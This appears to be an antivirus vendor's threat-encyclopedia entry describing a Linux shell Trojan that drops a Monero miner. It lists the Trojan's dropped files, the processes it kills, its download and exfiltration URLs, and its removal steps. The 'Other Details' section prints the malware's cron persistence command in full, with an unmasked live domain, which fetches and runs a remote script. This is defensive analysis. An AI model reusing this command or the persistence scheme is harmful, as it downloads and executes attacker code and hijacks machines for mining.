Trojan.SH.MALXMR.UWEJS
N/A
Linux
Threat Type: Trojan
Destructiveness: No
Encrypted: No
In the wild: Yes
OVERVIEW
Downloaded from the Internet, Dropped by other malware
This Trojan may be downloaded by other malware/grayware from remote sites.
It deletes itself after execution.
TECHNICAL DETAILS
1,927 bytes
, Other
No
06 Jan 2020
Connects to URLs/IPs, Steals information, Downloads files
Arrival Details
This Trojan may be downloaded by the following malware/grayware from remote sites:
Installation
This Trojan drops and executes the following files:
- x
- start.pl
It creates the following folders:
- /var/tmp/.nano
- /tmp/.vd
Other System Modifications
This Trojan deletes the following files:
- nohup.out
- /tmp/min.sh
- /tmp/min
- /tmp/nohup.out
- /tmp/cron.d
- /var/tmp/.nano
- /{Current Directory}/cron.d
- cron.d
- .bin
- /dev/shm/.bin
- /tmp/.bin
- /dev/shm/monero.tgz
- .vd
- /tmp/.vd
- /tmp/.vd/sslm.tgz
- min*
- {Current Directory}/min*
- /tmp/min*
Process Termination
This Trojan terminates the following processes if found running in the affected system's memory:
- rand
- rx
- rd
- tsm
- tsm2
- haiduc
- a
- sparky
- sh
- 2238Xae
- b
- f
- i
- p
- y
- rsync
- ps
- go
- x
- s
- b
- run
- idle
- minerd
- crond
- yam
- xmr
- python
- cron
- ntpd
- start
- start.sh
- libssl
- sparky.sh
Download Routine
This Trojan connects to the following URL(s) to download its component file(s):
- https://{BLOCKED}ter.com/assets/.style/remote/cron.sh
- https://{BLOCKED}ter.com/assets/.style/nano.sh
- https://{BLOCKED}ter.com/assets/.style/monero.tgz
- https://{BLOCKED}ter.com/assets/.style/sslm.tgz
It saves the files it downloads using the following names:
- /etc/cron.hourly/cron.sh → detected as Trojan.SH.MALXMR.UWEJT
- /etc/cron.daily/cron.sh → detected as Trojan.SH.MALXMR.UWEJT
- /var/tmp/.nano/nano.sh → detected as Trojan.SH.MALXMR.UWEJT
- /dev/shm/monero.tgz
- /tmp/.vd/sslm.tgz
Information Theft
This Trojan gathers the following data:
- Current Directory
- username
- System time and date
- Kernel Information
- Number of Processing Units
- List of Display Interface
Stolen Information
This Trojan sends the gathered information via HTTP POST to the following URL:
- http://{BLOCKED}ter.com/assets/.style/remote/info.php
Other Details
This Trojan connects to the following URL(s) to get the affected system's IP address:
- http://upajmeter.com/assets/.style/remote/info.php
It does the following:
- It creates the following cron jobs for persistence:
Path: {Current Directory}/cron.d- Schedule: Every 30 minutes
- Command: */30 * * * * /var/tmp/.nano/nano.sh &> /dev/null @reboot /bin/mkdir /var/tmp/.nnao && /usr/bin/curl -s https://upajmeter.com/assets/.style/nano.sh && /bin/chmod +x /var/tmp/.nano/nano.sh && /var/tmp/.nano/nano.sh
It deletes itself after execution.
SOLUTION
9.850
15.608.01
07 Jan 2020
15.609.00
08 Jan 2020
Scan your computer with your Trend Micro product to delete files detected as Trojan.SH.MALXMR.UWEJS. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:
Did this description help? Tell us how we did.